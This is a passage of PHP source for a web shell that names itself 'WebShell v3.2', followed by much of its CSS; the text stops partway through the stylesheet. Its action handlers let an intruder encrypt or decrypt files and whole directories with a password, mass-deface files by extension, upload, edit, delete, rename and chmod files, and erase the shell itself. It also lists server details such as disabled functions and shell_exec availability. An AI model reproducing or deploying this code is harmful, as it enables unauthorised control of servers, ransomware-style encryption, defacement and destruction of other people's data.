                break;
                
            case 'mass_decrypt':
                if (isset($_POST['selected_items'], $_POST['mass_decrypt_password'])) {
                    $success_count = 0;
                    $fail_count = 0;
                    foreach ($_POST['selected_items'] as $item) {
                        $item = urldecode($item);
                        if (@is_dir($item)) {
                            $result = decryptDirectory($item, $_POST['mass_decrypt_password']);
                        } elseif (@is_file($item)) {
                            $result = decryptFile($item, $_POST['mass_decrypt_password']);
                        } else {
                            $result = array('success' => false);
                        }
                        if ($result['success']) $success_count++; else $fail_count++;
                    }
                    $_SESSION['last_result'] = "Mass Decryption: $success_count items decrypted, $fail_count failed";
                    $_SESSION['last_type'] = $success_count > 0 ? 'success' : 'error';
                }
                break;
                
            case 'zip_selected':
                if (isset($_POST['selected_items'], $_POST['zip_name']) && class_exists('ZipArchive')) {
                    $zip = new ZipArchive();
                    $zip_file = $current_dir . '/' . $_POST['zip_name'] . '.zip';
                    
                    if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) {
                        $added_count = 0;
                        foreach ($_POST['selected_items'] as $item) {
                            $item = urldecode($item);
                            if (file_exists($item)) {
                                if (@is_dir($item)) {
                                    $iterator = new RecursiveIteratorIterator(
                                        new RecursiveDirectoryIterator($item, RecursiveDirectoryIterator::SKIP_DOTS),
                                        RecursiveIteratorIterator::SELF_FIRST
                                    );
                                    foreach ($iterator as $file) {
                                        if ($file->isFile()) {
                                            $file_path = $file->getRealPath();
                                            $relative_path = substr($file_path, strlen($current_dir) + 1);
                                            if ($zip->addFile($file_path, $relative_path)) $added_count++;
                                        }
                                    }
                                } elseif (@is_file($item)) {
                                    if ($zip->addFile($item, basename($item))) $added_count++;
                                }
                            }
                        }
                        $zip->close();
                        
                        if (file_exists($zip_file) && @filesize($zip_file) > 0) {
                            $_SESSION['last_result'] = "Zip created: " . $_POST['zip_name'] . '.zip with ' . $added_count . ' files';
                            $_SESSION['last_type'] = 'success';
                        } else {
                            $_SESSION['last_result'] = "Failed to create zip";
                            $_SESSION['last_type'] = 'error';
                            @unlink($zip_file);
                        }
                    } else {
                        $_SESSION['last_result'] = "Failed to create zip file";
                        $_SESSION['last_type'] = 'error';
                    }
                } else {
                    $_SESSION['last_result'] = "ZipArchive extension not available";
                    $_SESSION['last_type'] = 'error';
                }
                break;
        }
        
        header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
        exit();
        
    } else {
        switch ($action) {
            case 'encrypt_file':
                if (isset($_POST['file'], $_POST['encrypt_password'])) {
                    $result = encryptFile($_POST['file'], $_POST['encrypt_password']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'decrypt_file':
                if (isset($_POST['file'], $_POST['decrypt_password'])) {
                    $result = decryptFile($_POST['file'], $_POST['decrypt_password']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'encrypt_dir':
                if (isset($_POST['dir'], $_POST['encrypt_password'])) {
                    $result = encryptDirectory($_POST['dir'], $_POST['encrypt_password']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'decrypt_dir':
                if (isset($_POST['dir'], $_POST['decrypt_password'])) {
                    $result = decryptDirectory($_POST['dir'], $_POST['decrypt_password']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'mass_deface':
                if (isset($_POST['deface_path'], $_POST['deface_extensions'])) {
                    $deface_content = '';
                    
                    if (!empty($_POST['deface_content'])) {
                        $deface_content = $_POST['deface_content'];
                    } elseif (isset($_FILES['deface_file']) && $_FILES['deface_file']['error'] === UPLOAD_ERR_OK) {
                        $deface_content = @file_get_contents($_FILES['deface_file']['tmp_name']);
                    }
                    
                    if (!empty($deface_content)) {
                        $extensions = array_map('trim', explode(',', $_POST['deface_extensions']));
                        $extensions = array_map('strtolower', $extensions);
                        $result = massDeface($_POST['deface_path'], $extensions, $deface_content, $mass_deface_count);
                        $_SESSION['last_result'] = $result['message'];
                        $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    } else {
                        $_SESSION['last_result'] = "No deface content provided";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'upload':
                if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) {
                    $target = $current_dir . '/' . basename($_FILES['upload_file']['name']);
                    if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
                        $_SESSION['last_result'] = "File uploaded successfully: " . basename($_FILES['upload_file']['name']);
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Failed to upload file";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'delete_single':
                if (isset($_POST['delete_path'])) {
                    $path = $_POST['delete_path'];
                    if (@is_dir($path)) {
                        if (deleteDirectory($path)) {
                            $_SESSION['last_result'] = "Directory deleted: " . basename($path);
                            $_SESSION['last_type'] = 'success';
                        } else {
                            $_SESSION['last_result'] = "Failed to delete directory";
                            $_SESSION['last_type'] = 'error';
                        }
                    } elseif (@is_file($path)) {
                        if (@unlink($path)) {
                            $_SESSION['last_result'] = "File deleted: " . basename($path);
                            $_SESSION['last_type'] = 'success';
                        } else {
                            $_SESSION['last_result'] = "Failed to delete file";
                            $_SESSION['last_type'] = 'error';
                        }
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'create_file':
                if (isset($_POST['new_filename'])) {
                    $new_file = $current_dir . '/' . $_POST['new_filename'];
                    if (@touch($new_file)) {
                        $_SESSION['last_result'] = "File created: " . $_POST['new_filename'];
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Failed to create file";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'create_folder':
                if (isset($_POST['new_foldername'])) {
                    $new_folder = $current_dir . '/' . $_POST['new_foldername'];
                    if (@mkdir($new_folder, 0755, true)) {
                        $_SESSION['last_result'] = "Folder created: " . $_POST['new_foldername'];
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Failed to create folder";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'chmod':
                if (isset($_POST['chmod_path'], $_POST['chmod_permission'])) {
                    $result = safeChmod($_POST['chmod_path'], $_POST['chmod_permission']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'lock_file':
                if (isset($_POST['lock_path'])) {
                    $result = lockFilePermissions($_POST['lock_path']);
                    $_SESSION['last_result'] = $result['message'];
                    $_SESSION['last_type'] = $result['success'] ? 'success' : 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'edit_file':
                if (isset($_POST['edit_path'], $_POST['edit_content'])) {
                    $content = $_POST['edit_content'];
                    
                    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
                        $content = stripslashes($content);
                    }
                    
                    if (@file_put_contents($_POST['edit_path'], $content) !== false) {
                        $_SESSION['last_result'] = "File saved successfully";
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Failed to save file";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'rename':
                if (isset($_POST['old_path'], $_POST['new_name'])) {
                    $new_path = dirname($_POST['old_path']) . '/' . $_POST['new_name'];
                    if (@rename($_POST['old_path'], $new_path)) {
                        $_SESSION['last_result'] = "Renamed successfully";
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Failed to rename";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'self_destruct':
                if (@unlink(__FILE__)) {
                    session_destroy();
                    exit('SHELL DESTROYED');
                } else {
                    $_SESSION['last_result'] = "Failed to destroy shell - check permissions";
                    $_SESSION['last_type'] = 'error';
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
                
            case 'change_path':
                if (isset($_POST['new_path'])) {
                    if (@is_dir($_POST['new_path'])) {
                        $_SESSION['current_dir'] = @realpath($_POST['new_path']);
                        $current_dir = $_SESSION['current_dir'];
                        $_SESSION['last_result'] = "Path changed to: " . $current_dir;
                        $_SESSION['last_type'] = 'success';
                    } else {
                        $_SESSION['last_result'] = "Invalid directory path";
                        $_SESSION['last_type'] = 'error';
                    }
                    header("Location: ?cwd=" . urlencode($current_dir) . "&result=1");
                    exit();
                }
                break;
        }
    }
}

if (isset($_GET['result']) && isset($_SESSION['last_result']) && $_SESSION['last_result']) {
    $operation_result = $_SESSION['last_result'];
    $operation_type = $_SESSION['last_type'];
    $operation_details = isset($_SESSION['last_details']) ? $_SESSION['last_details'] : '';
    $show_notification = true;
    
    unset($_SESSION['last_result']);
    unset($_SESSION['last_type']);
    unset($_SESSION['last_details']);
}

$files = array();
$search_results = array();
$search_query = '';

if (isset($_GET['search']) && !isset($_GET['cwd'])) {
    $search_query = trim($_GET['search']);
    $_SESSION['search_query'] = $search_query;
} elseif (isset($_SESSION['search_query']) && !isset($_GET['cwd'])) {
    $search_query = $_SESSION['search_query'];
} else {
    $search_query = '';
    unset($_SESSION['search_query']);
}

if (@is_dir($current_dir)) {
    $files = array();
    $item_count = 0;
    $max_items = 3000;
    
    if ($handle = @opendir($current_dir)) {
        while (($item = @readdir($handle)) !== false && $item_count < $max_items) {
            if ($item == '.' || $item == '..') continue;
            
            $path = $current_dir . '/' . $item;
            if (!file_exists($path)) continue;
            
            $is_dir = @is_dir($path);
            $encrypted = false;
            
            if (!$is_dir && @is_file($path) && @is_readable($path)) {
                $encrypted = isFileEncrypted($path);
            }
            
            $size = 0;
            if (!$is_dir) {
                $size = @filesize($path);
            }
            
            $files[] = array(
                'name' => $item,
                'path' => $path,
                'type' => $is_dir ? 'dir' : 'file',
                'size' => $size,
                'modified' => @filemtime($path),
                'permissions' => substr(sprintf('%o', @fileperms($path)), -4),
                'encrypted' => $encrypted,
                'readable' => @is_readable($path),
                'writable' => @is_writable($path)
            );
            
            $item_count++;
        }
        @closedir($handle);
    }
    
    if ($search_query) {
        foreach ($files as $file) {
            if (stripos($file['name'], $search_query) !== false) {
                $search_results[] = $file;
            }
        }
    }
}

if (isset($_GET['download']) && file_exists($_GET['download'])) {
    $file = @realpath($_GET['download']);
    $allowed_dir = @realpath($current_dir);
    
    if (strpos($file, $allowed_dir) === 0 && @is_file($file) && @is_readable($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . @filesize($file));
        @readfile($file);
        exit;
    }
}

if (isset($_GET['getfile']) && file_exists($_GET['getfile'])) {
    $file = @realpath($_GET['getfile']);
    $allowed_dir = @realpath($current_dir);
    
    if (strpos($file, $allowed_dir) === 0 && @is_file($file) && @is_readable($file)) {
        $content = @file_get_contents($file);
        if (isFileEncrypted($file)) {
            echo "[ENCRYPTED FILE - DECRYPT FIRST]";
        } else {
            echo $content;
        }
        exit;
    }
}

$system_info = array(
    'PHP Version' => phpversion(),
    'Server Software' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'N/A',
    'Server IP' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : 'N/A',
    'Client IP' => isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'N/A',
    'User Agent' => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'N/A',
    'OS' => @php_uname('s') . ' ' . @php_uname('r'),
    'Document Root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : 'N/A',
    'Free Disk Space' => @disk_free_space('/') ? formatBytes(@disk_free_space('/')) : 'N/A',
    'Total Disk Space' => @disk_total_space('/') ? formatBytes(@disk_total_space('/')) : 'N/A',
    'Memory Limit' => @ini_get('memory_limit'),
    'Max Execution Time' => @ini_get('max_execution_time') . 's',
    'Disabled Functions' => @ini_get('disable_functions') ?: 'None',
    'OpenSSL Version' => defined('OPENSSL_VERSION_TEXT') ? OPENSSL_VERSION_TEXT : 'N/A',
    'Shell Exec Available' => function_exists('shell_exec') ? 'Yes' : 'No',
    'Safe Mode' => @ini_get('safe_mode') ? 'On' : 'Off'
);

if (isset($_GET['get_suggestions']) && !empty($search_query)) {
    $suggestions = array();
    foreach ($files as $file) {
        if (stripos($file['name'], $search_query) !== false) {
            $suggestions[] = array(
                'name' => $file['name'],
                'path' => $file['path'],
                'type' => $file['type'],
                'encrypted' => $file['encrypted']
            );
    }
    }
    header('Content-Type: application/json');
    echo json_encode(array_slice($suggestions, 0, 10));
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title><?php echo $SHELL_NAME; ?> WebShell v3.2</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            -webkit-tap-highlight-color: transparent;
        }
        
        :root {
            --bg-primary: #0f0f0f;
            --bg-secondary: #1a1a1a;
            --bg-tertiary: #2d2d2d;
            --border-color: #333;
            --text-primary: #ffffff;
            --text-secondary: #b0b0b0;
            --text-tertiary: #888;
            --accent-primary: #667eea;
            --accent-secondary: #764ba2;
            --danger: #ff416c;
            --success: #56ab2f;
            --warning: #ffb347;
            --info: #4a90e2;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif;
            background: var(--bg-primary);
            min-height: 100vh;
            padding: 15px;
            color: var(--text-primary);
            overflow-x: hidden;
        }
        
        .panel {
            background: var(--bg-secondary);
            border-radius: 12px;
            border: 1px solid var(--border-color);
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3);
            padding: 20px;
            margin-bottom: 20px;
        }
        
        .notification {
            position: fixed;
            top: 20px;
            right: 20px;
            padding: 15px 20px;
            border-radius: 8px;
            z-index: 10000;
            animation: slideIn 0.3s ease;
            max-width: 400px;
            display: flex;
            flex-direction: column;
            gap: 5px;
            border-left: 4px solid;
            box-shadow: 0 5px 15px rgba(0,0,0,0.3);
        }
        
        .notification.success {
            background: var(--bg-secondary);
            border-left-color: var(--success);
        }
        
        .notification.error {
            background: var(--bg-secondary);
            border-left-color: var(--danger);
        }
        
        .notification.info {
            background: var(--bg-secondary);
            border-left-color: var(--info);
        }
        
        .notification-title {
            font-weight: bold;
            font-size: 14px;
            display: flex;
            align-items: center;
            gap: 8px;
        }
        
        .notification-message {
            font-size: 13px;
            color: var(--text-secondary);
        }
        
        .notification-details {
            font-size: 11px;
            color: var(--text-tertiary);
            background: rgba(0,0,0,0.2);
            padding: 5px 8px;
            border-radius: 4px;
            margin-top: 3px;
        }
        
        @keyframes slideIn {
            from {
                transform: translateX(100%);
                opacity: 0;
            }
            to {
                transform: translateX(0);
                opacity: 1;
            }
        }
        
        .header-container {
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
            gap: 15px;
            margin-bottom: 20px;
        }
        
        .site-info {
            display: flex;
            flex-wrap: wrap;
            gap: 12px;
            font-size: 12px;
            background: var(--bg-tertiary);
            padding: 10px 15px;
            border-radius: 8px;
            align-items: center;
        }
        
        .site-info span {
            display: inline-flex;
            align-items: center;
            gap: 5px;
            padding: 3px 8px;
            background: rgba(0, 0, 0, 0.3);
            border-radius: 4px;
        }
        
        .tabs-container {
            display: flex;
            gap: 8px;
            margin-bottom: 20px;
            flex-wrap: wrap;
            justify-content: center;
            background: var(--bg-tertiary);
            padding: 8px;
            border-radius: 10px;
        }
        
        .tab-btn {
            padding: 12px 20px;
            background: transparent;
            border: 1px solid var(--border-color);
            border-radius: 8px;
            color: var(--text-secondary);
            font-weight: 600;
            font-size: 14px;
            cursor: pointer;
            transition: all 0.3s;
            white-space: nowrap;
            flex: 1;
            min-width: 120px;
            text-align: center;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 8px;
        }
        
        @media (max-width: 768px) {
            .tab-btn {
                min-width: calc(33.333% - 8px);
                padding: 10px 12px;
                font-size: 13px;
            }
        }
        
        @media (max-width: 480px) {
            .tab-btn {
                min-width: calc(50% - 8px);
            }
        }
        
        .tab-btn.active {
            background: linear-gradient(135deg, var(--accent-primary), var(--accent-secondary));
            border-color: transparent;
            color: white;
            transform: translateY(-2px);
            box-shadow: 0 8px 20px rgba(102, 126, 234, 0.3);
        }
        
        .tab-btn:hover:not(.active) {
            background: rgba(255, 255, 255, 0.05);
            color: var(--text-primary);
        }
        
        .tab-content {
            display: none;
            animation: fadeIn 0.3s ease;
        }
        
        .tab-content.active {
            display: block;
        }
        
        .path-navigator {
            background: var(--bg-tertiary);
            border-radius: 10px;
            padding: 15px;
            margin-bottom: 20px;
            border: 1px solid var(--border-color);
        }
        
        .path-breadcrumb {
            display: flex;
            flex-wrap: wrap;
            align-items: center;
            gap: 8px;
            margin-bottom: 15px;
            padding-bottom: 15px;
            border-bottom: 1px solid var(--border-color);
        }
        
        .path-segment {
            display: flex;
            align-items: center;
            gap: 5px;
            font-size: 14px;
        }
        
        .path-segment a {
            color: var(--accent-primary);
            text-decoration: none;
            padding: 5px 10px;
            border-radius: 5px;
            transition: all 0.2s;
        }
        
        .path-segment a:hover {
            background: rgba(102, 126, 234, 0.1);
            text-decoration: underline;
        }
        
        .path-tool-item {
            background: var(--bg-secondary);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            padding: 12px;
            display: flex;
            flex-direction: column;
            gap: 8px;
            margin-bottom: 10px;
        }
        
        .path-input-group {
            display: flex;
            gap: 8px;
            position: relative;
        }
        
        .path-input {
            flex: 1;
            padding: 10px 12px;
            background: var(--bg-primary);
            border: 1px solid var(--border-color);
            border-radius: 6px;
            color: var(--text-primary);
            font-size: 13px;
            font-family: monospace;
        }
        
        .path-input:focus {
            outline: none;
            border-color: var(--accent-primary);
        }
        
        .path-btn {
            padding: 10px 16px;
            background: var(--accent-primary);
            border: none;
            border-radius: 6px;
            color: white;
            font-weight: 600;
            font-size: 13px;
            cursor: pointer;
            transition: all 0.3s;
            white-space: nowrap;
        }
        
        .path-btn:hover {
            background: var(--accent-secondary);
            transform: translateY(-1px);
        }
        
        .search-suggestions {
            position: absolute;
            top: 100%;
            left: 0;
            right: 0;
            background: var(--bg-primary);
            border: 1px solid var(--border-color);
            border-radius: 6px;
            margin-top: 5px;
            max-height: 300px;
            overflow-y: auto;
            z-index: 1000;
            display: none;
        }
        
        .suggestion-item {
            padding: 10px 15px;
            cursor: pointer;
            border-bottom: 1px solid var(--border-color);
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .suggestion-item:hover {
            background: var(--bg-tertiary);
        }
        
        .suggestion-item:last-child {
            border-bottom: none;
        }
        
        .suggestion-icon {
            width: 16px;
            height: 16px;
            border-radius: 3px;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 10px;
            font-weight: bold;
        }
        
        .suggestion-icon.file {
            background: var(--accent-primary);
        }
        
        .suggestion-icon.dir {
            background: var(--success);
        }
        
        .file-manager-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
            gap: 10px;
        }
        
        .search-container {
            flex: 1;
            min-width: 300px;
            max-width: 500px;
            position: relative;
        }
        
        .search-input {
            width: 100%;
            padding: 12px 15px;
            background: var(--bg-tertiary);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            color: var(--text-primary);
            font-size: 14px;
            transition: all 0.3s;
        }
        
        .search-input:focus {
            outline: none;
            border-color: var(--accent-primary);
            box-shadow: 0 0 0 2px rgba(102, 126, 234, 0.1);
        }
        
        .mass-actions {
            display: flex;
            gap: 8px;
            flex-wrap: wrap;
            margin-bottom: 15px;
            display: none;
        }
        
        .mass-btn {
            padding: 8px 12px;
            background: var(--bg-tertiary);
            border: 1px solid var(--border-color);
            border-radius: 6px;
            color: var(--text-primary);
            font-size: 12px;
            cursor: pointer;
            transition: all 0.2s;
        }
        
        .mass-btn:hover {
            background: var(--accent-primary);
            border-color: var(--accent-primary);
        }
        
        .file-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
            gap: 12px;
            margin-bottom: 30px;
        }
        
        @media (max-width: 768px) {
            .file-grid {
                grid-template-columns: repeat(auto-fill, minmax(200px, 1fr));
            }
        }
        
        @media (max-width: 480px) {
            .file-grid {
                grid-template-columns: 1fr;
            }
        }
        
        .file-item {
            background: var(--bg-tertiary);
            border-radius: 10px;
            padding: 15px;
            border: 1px solid var(--border-color);
            transition: all 0.3s;
            position: relative;
        }
        
        .file-item:hover {
            border-color: var(--accent-primary);
            transform: translateY(-3px);
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.4);
        }
        
        .file-checkbox {
            position: absolute;
            top: 12px;
            right: 12px;
            width: 18px;
            height: 18px;
            cursor: pointer;
            accent-color: var(--accent-primary);
        }
        
        .file-name {
            font-weight: 600;
            margin-bottom: 8px;
            word-break: break-all;
            font-size: 14px;
            padding-right: 25px;
        }
        
        .file-details {
            font-size: 11px;
            color: var(--text-secondary);
            margin-bottom: 12px;
            line-height: 1.4;
        }
        
        .file-actions {
            display: grid;
            grid-template-columns: 1fr 1fr 1fr;
            gap: 6px;
        }
        
        .action-btn {
            padding: 8px;
            background: rgba(255, 255, 255, 0.05);
            border: 1px solid var(--border-color);
            border-radius: 6px;
            color: var(--text-primary);
            font-size: 11px;
            cursor: pointer;
            transition: all 0.2s;
            text-align: center;
            min-height: 32px;
            display: flex;
            align-items: center;
            justify-content: center;
            word-break: break-word;
            line-height: 1.2;
        }
        
        .action-btn:hover {
            background: rgba(255, 255, 255, 0.1);
            border-color: var(--accent-primary);
        }
        
        .action-btn.delete-btn {
            background: linear-gradient(135deg, var(--danger), #ff4b2b);
            color: white;
            border-color: var(--danger);
        }
        
        .action-btn.delete-btn:hover {
            background: linear-gradient(135deg, #ff4b2b, var(--danger));
            transform: translateY(-1px);
            box-shadow: 0 5px 15px rgba(255, 65, 108, 0.4);
        }
        
        .action-btn.chmod-btn {
            background: linear-gradient(135deg, var(--warning), #ff8a00);
            color: white;
            border-color: var(--warning);
        }
        
        .action-btn.chmod-btn:hover {
            background: linear-gradient(135deg, #ff8a00, var(--warning));
            transform: translateY(-1px);
            box-shadow: 0 5px 15px rgba(255, 179, 71, 0.4);
        }
        
        .action-btn.lock-btn {
            background: linear-gradient(135deg, var(--info), #2a8fd6);
            color: white;
            border-color: var(--info);
        }
        
        .action-btn.lock-btn:hover {
            background: linear-gradient(135deg, #2a8fd6, var(--info));
            transform: translateY(-1px);
            box-shadow: 0 5px 15px rgba(74, 144, 226, 0.4);
        }
        
        .terminal-container {
            background: #000;
            border-radius: 10px;
            padding: 20px;
            color: #00ff00;
            font-family: 'Courier New', monospace;
            font-size: 13px;
            height: 500px;
            overflow-y: auto;
            margin-bottom: 20px;
            border: 1px solid #333;
            position: relative;
            word-break: break-word;
            overflow-wrap: break-word;
            white-space: pre-wrap;
        }
        
        .terminal-output {
            line-height: 1.5;
            overflow-wrap: break-word;
        }
        
        .terminal-scroll-indicator {
            position: absolute;
            bottom: 10px;
            right: 10px;
            background: rgba(0, 255, 0, 0.2);
            color: #00ff00;
            padding: 5px 10px;
            border-radius: 4px;
            font-size: 11px;
            display: none;
        }
        
        .terminal-form {
            display: flex;
            gap: 10px;
        }
        
        .terminal-input {
            flex: 1;
            padding: 12px 15px;
            background: #111;
            border: 1px solid #333;
            border-radius: 8px;
            color: #00ff00;
            font-family: 'Courier New', monospace;
            font-size: 13px;
        }
        
        .terminal-submit {
            padding: 12px 25px;
            background: #00ff00;
            border: none;
            border-radius: 8px;
            color: #000;
            font-weight: bold;
            cursor: pointer;
            transition: all 0.3s;
        }
        
        .deface-form {
            display: flex;
            flex-direction: column;
            gap: 15px;
        }
        
        .deface-tabs {
            display: flex;
            gap: 10px;
            margin-bottom: 20px;
        }
        
        .deface-tab-btn {
            padding: 12px 20px;
            background: var(--bg-tertiary);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            color: var(--text-secondary);
            cursor: pointer;
            flex: 1;
            text-align: center;
        }
        
        .deface-tab-btn.active {
            background: var(--accent-primary);
            color: white;
            border-color: var(--accent-primary);
        }
        
        .deface-tab-content {
            display: none;
        }
        
        .deface-tab-content.active {
            display: block;
        }
        
        .form-group {
            display: flex;
            flex-direction: column;
            gap: 8px;
        }
        
        .form-label {
            font-weight: 600;
            font-size: 14px;
            color: var(--text-primary);
        }
        
        .form-input, .form-textarea {
            padding: 12px 15px;
            background: var(--bg-tertiary);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            color: var(--text-primary);
            font-size: 14px;
            transition: all 0.3s;
        }
        
        .form-textarea {
            min-height: 200px;
            resize: vertical;
            font-family: monospace;
        }
        
        .modal-overlay {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.8);
            backdrop-filter: blur(10px);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 10000;
            padding: 20px;
            opacity: 0;
            visibility: hidden;
            transition: all 0.3s;
        }
        
        .modal-overlay.active {
            opacity: 1;
            visibility: visible;
        }
        
        .modal-content {
            background: var(--bg-secondary);
            border-radius: 16px;
            padding: 30px;
            width: 100%;
            max-width: 800px;
            border: 1px solid var(--border-color);
            box-shadow: 0 25px 50px rgba(0, 0, 0, 0.5);
            transform: translateY(20px);
            transition: transform 0.3s);
        }
        
        .modal-overlay.active .modal-content {
            transform: translateY(0);
        }
        
        .modal-title {
            font-size: 24px;
            font-weight: 700;
            margin-bottom: 20px;
            color: var(--text-primary);
        }
        
        .system-info-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
            gap: 15px;
            margin-bottom: 20px;
        }
        
        .info-card {
            background: var(--bg-tertiary);
            border-radius: 10px;
            padding: 15px;
            border-left: 4px solid var(--accent-primary);
        }
        
        .info-card h3 {
            font-size: 14px;
            color: var(--text-secondary);
            margin-bottom: 10px;
            text-transform: uppercase;
            letter-spacing: 1px;
        }
        
        .info-card p {
            font-size: 13px;
            color: var(--text-primary);
            font-family: monospace;
            word-break: break-all;
        }
        
        .edit-modal-content {
            background: var(--bg-secondary);
            border-radius: 16px;
            padding: 30px;
            width: 100%;
            max-width: 900px;
            border: 1px solid var(--border-color);
            box-shadow: 0 25px 50px rgba(0, 0, 0, 0.5);
            transform: translateY(20px);
            transition: transform 0.3s;
            height: 80vh;
            display: flex;
            flex-direction: column;
        }
        
        .edit-header {
            margin-bottom: 20px;
            flex-shrink: 0;
        }
        
        .edit-textarea-container {
            flex: 1;
            display: flex;
            flex-direction: column;
            min-height: 0;
        }
        
        .edit-textarea {
            flex: 1;
            min-height: 300px;
            width: 100%;
            padding: 20px;
            background: var(--bg-primary);
            border: 1px solid var(--border-color);
            border-radius: 8px;
            color: var(--text-primary);
            font-family: 'Consolas', 'Monaco', monospace;
            font-size: 14px;
            resize: none;
            line-height: 1.5;
            tab-size: 4;
            white-space: pre;
            overflow-wrap: normal;
            overflow-x: auto;
        }
        
        .edit-footer {
            margin-top: 20px;
            display: flex;
            gap: 10px;
            flex-shrink: 0;
        }
        
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(10px); }
            to { opacity: 1; transform: translateY(0); }
        }
        
        .flex-center {
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .flex-between {
            display: flex;
            align-items: center;
            justify-content: space-between;
        }
        
        .text-gradient {
            background: linear-gradient(135deg, var(--accent-primary), var(--accent-secondary));
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
        }
        
        .btn-primary {
            padding: 12px 24px;
            background: linear-gradient(135deg, var(--accent-primary), var(--accent-secondary));
            border: none;
            border-radius: 8px;
            color: white;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
        }
        
        .btn-primary:hover {
            transform: translateY(-2px);
            box-shadow: 0 8px 20px rgba(102, 126, 234, 0.3);
        }
        
        .btn-danger {
            padding: 12px 24px;
            background: linear-gradient(135deg, var(--danger), #ff4b2b);
            border: none;
            border-radius: 8px;
            color: white;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
        }
        
        .btn-danger:hover {
            transform: translateY(-2px);
            box-shadow: 0 8px 20px rgba(255, 65, 108, 0.3);
        }
        
        ::-webkit-scrollbar {
            width: 10px;
            height: 10px;
        }
        
        ::-webkit-scrollbar-track {
            background: var(--bg-tertiary);
            border-radius: 10px;
        }
        
